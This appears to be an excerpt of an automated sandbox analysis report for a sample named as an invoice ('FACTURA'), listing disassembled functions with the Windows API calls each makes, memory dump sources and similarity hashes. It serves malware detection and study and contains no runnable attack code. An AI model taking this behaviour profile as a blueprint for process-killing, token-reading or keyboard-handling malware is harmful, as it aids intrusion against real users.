                                                                            Function 00F28879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F280A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F280C0
                                                                              • Part of subcall function 00F280A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F280CA
                                                                              • Part of subcall function 00F280A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F280D9
                                                                              • Part of subcall function 00F280A9: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00F280E0
                                                                              • Part of subcall function 00F280A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F280F6
                                                                            • GetLengthSid.ADVAPI32(?,00000000,00F2842F), ref: 00F288CA
                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F288D6
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F288DD
                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F288F6
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00F2842F), ref: 00F2890A
                                                                            • HeapFree.KERNEL32(00000000), ref: 00F28911
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                                                            • String ID:
                                                                            • API String ID: 169236558-0
                                                                            • Opcode ID: 4369b643c19301ec8a16b7961e1512e995deb0ac338f82626343f84bdcbbe5f7
                                                                            • Instruction ID: a7d456a34720214083a0285449942f5606c347b93e6562ae47438f56a8381309
                                                                            • Opcode Fuzzy Hash: 4369b643c19301ec8a16b7961e1512e995deb0ac338f82626343f84bdcbbe5f7
                                                                            • Instruction Fuzzy Hash: 5A11B132902619FFDB109FA4EC09BBE7B68EB44362F148068E945D7111CB329D46EB60
                                                                            Function 00F2B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 00F2B7B5
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F2B7C6
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F2B7CD
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00F2B7D5
                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F2B7EC
                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 00F2B7FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: 94321793307ea9667ded1a10677aa6e57f0b40bac890c75421f0bd8faf481fcd
                                                                            • Instruction ID: 98ee6ca24a404fac91b1ee4079dc5bf73e9e655d5ab8b3adf2c2c51c1c3acb88
                                                                            • Opcode Fuzzy Hash: 94321793307ea9667ded1a10677aa6e57f0b40bac890c75421f0bd8faf481fcd
                                                                            • Instruction Fuzzy Hash: D3018475E00319BBEB109BA69C45A5EBFB8EB48321F0040B5FF04EB291D6309C04DF90
                                                                            Function 00EF0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EF0193
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EF019B
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EF01A6
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EF01B1
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EF01B9
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EF01C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            • Opcode ID: 39aaf055f2d17ff8a334dca0fb025251d83cd6eb32c0ea82540ad95bd9a74a47
                                                                            • Instruction ID: 4ffd7459b55b67004f8428738d5149251d096aca1a94612b1b7153e72e875c47
                                                                            • Opcode Fuzzy Hash: 39aaf055f2d17ff8a334dca0fb025251d83cd6eb32c0ea82540ad95bd9a74a47
                                                                            • Instruction Fuzzy Hash: 43016CB09017597DE3009F5A8C85B52FFE8FF19354F00415BA15C47941C7F5A868CBE5
                                                                            Function 00F353E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F353F9
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F3540F
                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00F3541E
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F3542D
                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F35437
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F3543E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 87be0ddaa886498bb8746757dc129c3af64614cf0730a01f61977b253a1defb0
                                                                            • Instruction ID: eb47b0904c88b6f172b53fb6eacb072d555aba0ff5168caeaff112392fcaa9fe
                                                                            • Opcode Fuzzy Hash: 87be0ddaa886498bb8746757dc129c3af64614cf0730a01f61977b253a1defb0
                                                                            • Instruction Fuzzy Hash: E4F01D3264165CBBE7215BA2DC0DEAB7B7CEBC6B12F0001A9FB05D206196A11A05A6B5
                                                                            Function 00F37230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00F37243
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 00F37254
                                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00EE0EE4,?,?), ref: 00F37261
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00EE0EE4,?,?), ref: 00F3726E
                                                                              • Part of subcall function 00F36C35: CloseHandle.KERNEL32(00000000,?,00F3727B,?,00EE0EE4,?,?), ref: 00F36C3F
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F37281
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 00F37288
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: f47957cb713c378d07a73e7e59c5a87dd725bc2e5cadb6bbb0b69331d9267610
                                                                            • Instruction ID: 731d2b1033b69c28be3cbfee72bfcac0d9dae599b29993d70b3ed91128ac32fb
                                                                            • Opcode Fuzzy Hash: f47957cb713c378d07a73e7e59c5a87dd725bc2e5cadb6bbb0b69331d9267610
                                                                            • Instruction Fuzzy Hash: 15F05EB6541716EBDB122B64ED4C9DB7729EF45723F100571F603914A0CB7A5805EB50
                                                                            Function 00F485ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00F48613
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00F48722
                                                                            • VariantClear.OLEAUT32(?), ref: 00F4889A
                                                                              • Part of subcall function 00F37562: VariantInit.OLEAUT32(00000000), ref: 00F375A2
                                                                              • Part of subcall function 00F37562: VariantCopy.OLEAUT32(00000000,?), ref: 00F375AB
                                                                              • Part of subcall function 00F37562: VariantClear.OLEAUT32(00000000), ref: 00F375B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                            • API String ID: 4237274167-1221869570
                                                                            • Opcode ID: 8bb55928d865dfc386d05b9397d204c42b2e9399ddf62fa25d8b8f4db59b75bc
                                                                            • Instruction ID: 9eff17961ddce2f44ded378a40774e126b780fb319ad2d7111b14363579e3882
                                                                            • Opcode Fuzzy Hash: 8bb55928d865dfc386d05b9397d204c42b2e9399ddf62fa25d8b8f4db59b75bc
                                                                            • Instruction Fuzzy Hash: BA918F71A043019FC710DF24C88495EBBE4EF89754F14496EF89A9B362DB31ED06DB92
                                                                            Function 00F32A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00EEFC86: _wcscpy.LIBCMT ref: 00EEFCA9
                                                                            • _memset.LIBCMT ref: 00F32B87
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F32BB6
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F32C69
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F32C97
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                            • String ID: 0
                                                                            • API String ID: 4152858687-4108050209
                                                                            • Opcode ID: 233fedd44de743085a3e24a93d89874fb7881067219ea95166ecd9c46d3a9681
                                                                            • Instruction ID: 9bbdd5b26dd538e0c7ec2e44928d45fb14b9ec61f2152dd6472063caad6dc094
                                                                            • Opcode Fuzzy Hash: 233fedd44de743085a3e24a93d89874fb7881067219ea95166ecd9c46d3a9681
                                                                            • Instruction Fuzzy Hash: 6E51DE71A083009BDBA59F28D845A6FB7E8EF853B0F141A2DF991E3291DB70CD04A752
                                                                            Function 00EE3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$_free
                                                                            • String ID: 3c$_
                                                                            • API String ID: 2620147621-4099079164
                                                                            • Opcode ID: 562430465aec946a659f73678b2ee5340ecca031b6b4472d19fa670f1261678f
                                                                            • Instruction ID: b6fc7d6fd9f65311c24623b71c7d0ccc4351d61ffb1aedf183b3064cc7275f24
                                                                            • Opcode Fuzzy Hash: 562430465aec946a659f73678b2ee5340ecca031b6b4472d19fa670f1261678f
                                                                            • Instruction Fuzzy Hash: D9519B71A043858FDB24CF29C844B6EBBE5EF85314F04592DE999E7391EB31E941CB42
                                                                            Function 00EE6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$_memmove
                                                                            • String ID: 3c$ERCP
                                                                            • API String ID: 2532777613-1756721700
                                                                            • Opcode ID: 7de2801853cb130c35da7899e220128079ab4b8c2c599b209d36e06ca560c0f1
                                                                            • Instruction ID: bdeba601a69cf273f76ba3dc09b8c55f4964d8e868bed7b6e08e2d80658725a3
                                                                            • Opcode Fuzzy Hash: 7de2801853cb130c35da7899e220128079ab4b8c2c599b209d36e06ca560c0f1
                                                                            • Instruction Fuzzy Hash: 4F51D271900309DBDB24CF66C841BEAB7F4EF58354F20856EE94AEB251E770EA40CB40
                                                                            Function 00F2D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00F2D5D4
                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F2D60A
                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F2D61B
                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F2D69D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                            • String ID: DllGetClassObject
                                                                            • API String ID: 753597075-1075368562
                                                                            • Opcode ID: df892a7f5ceb9ed69e88e3bf35cd4e73e1bd95819922151752b638f3eece9e0a
                                                                            • Instruction ID: 8328799abb59b0a66c9082ee5b2db135dd780115e4c149d6d349aa6929abc8ab
                                                                            • Opcode Fuzzy Hash: df892a7f5ceb9ed69e88e3bf35cd4e73e1bd95819922151752b638f3eece9e0a
                                                                            • Instruction Fuzzy Hash: 4241BFB1600214EFDB04DF64D884B9A7FAAEF44314F1581A9ED09DF246D7B4DD44EBA0
                                                                            Function 00F32753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F327C0
                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F327DC
                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00F32822
                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F95890,00000000), ref: 00F3286B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1173514356-4108050209
                                                                            • Opcode ID: 9e28e54efe157b349328f77165de98239bd7900e43385ff30194f1b46aef0f02
                                                                            • Instruction ID: 72f3687fce4d28850b13304777ca8efb738aba80659260f9afc9b5a9dd9ea8d3
                                                                            • Opcode Fuzzy Hash: 9e28e54efe157b349328f77165de98239bd7900e43385ff30194f1b46aef0f02
                                                                            • Instruction Fuzzy Hash: A241BE716043019FDB60DF24CC84B2ABBE8EF85334F144A6EF9A697291D734E905DB62
                                                                            Function 00F4D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F4D7C5
                                                                              • Part of subcall function 00ED784B: _memmove.LIBCMT ref: 00ED7899
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower_memmove
                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                            • API String ID: 3425801089-567219261
                                                                            • Opcode ID: 224b793de346f69253cc079e29bda0e4806767b788497b139d9c6c64ce222878
                                                                            • Instruction ID: 56d4eea2240237b924548d625b09dae5d89c88bb96988c52d8eba8b24f6df116
                                                                            • Opcode Fuzzy Hash: 224b793de346f69253cc079e29bda0e4806767b788497b139d9c6c64ce222878
                                                                            • Instruction Fuzzy Hash: E6317A71904619ABCF00EF58C9519FEB7F5FF04320B10866AE866A77D2DB71A906DB80
                                                                            Function 00F28E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F2AABC
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F28F14
                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F28F27
                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F28F57
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_memmove$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 365058703-1403004172
